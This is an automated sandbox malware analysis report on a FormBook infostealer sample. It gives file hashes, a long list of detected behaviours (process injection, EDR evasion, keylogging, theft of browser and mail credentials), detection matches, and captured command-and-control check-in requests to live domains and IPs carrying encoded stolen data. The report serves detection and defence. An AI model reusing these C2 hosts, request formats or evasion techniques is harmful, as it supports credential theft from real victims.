Windows Analysis Report
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Analysis ID: 1466067
MD5: a6d5020bf8bfe2dc1140a50936ef5ec9
SHA1: 284d6d281a186da8c7bfa0ee5ce310be41be800b
SHA256: ac162f990dd540c5b295e5c8dfccc04374519feaa70ed0439292f70761a034cd
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe ReversingLabs: Detection: 47%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_007B4696
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BC93C FindFirstFileW,FindClose, 0_2_007BC93C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_007BC9C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BF200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BF35D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BF65E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B3A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BBF27
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose, 9_2_02C9C400
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose, 9_2_02C9C536
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then xor eax, eax 9_2_02C89BA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then pop edi 9_2_02C8E029
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then mov ebx, 00000004h 9_2_032904E8

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49727 -> 74.208.236.38:80
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.6:49730 -> 142.202.6.230:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 142.202.6.230:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 142.202.6.230:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49733 -> 142.202.6.230:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 74.208.236.230:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 74.208.236.230:80
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: REPRISE-HOSTINGUS REPRISE-HOSTINGUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_007C25E2
Source: global traffic HTTP traffic detected: GET /9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT HTTP/1.1Host: www.costmoon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic DNS traffic detected: DNS query: www.costmoon.com
Source: global traffic DNS traffic detected: DNS query: www.6171nvuhb.rent
Source: global traffic DNS traffic detected: DNS query: www.motorsportgives.com
Source: unknown HTTP traffic detected: POST /hqcp/ HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.6171nvuhb.rentReferer: http://www.6171nvuhb.rent/hqcp/Content-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 45 52 31 36 58 70 4b 66 54 70 31 49 57 36 50 54 6c 33 71 69 65 4c 6f 55 34 31 55 4e 49 37 69 6b 50 77 49 42 4e 77 62 64 57 41 69 4d Data Ascii: Stux7=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvER16XpKfTp1IW6PTl3qieLoU41UNI7ikPwIBNwbdWAiM
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 02 Jul 2024 11:53:26 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:04 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 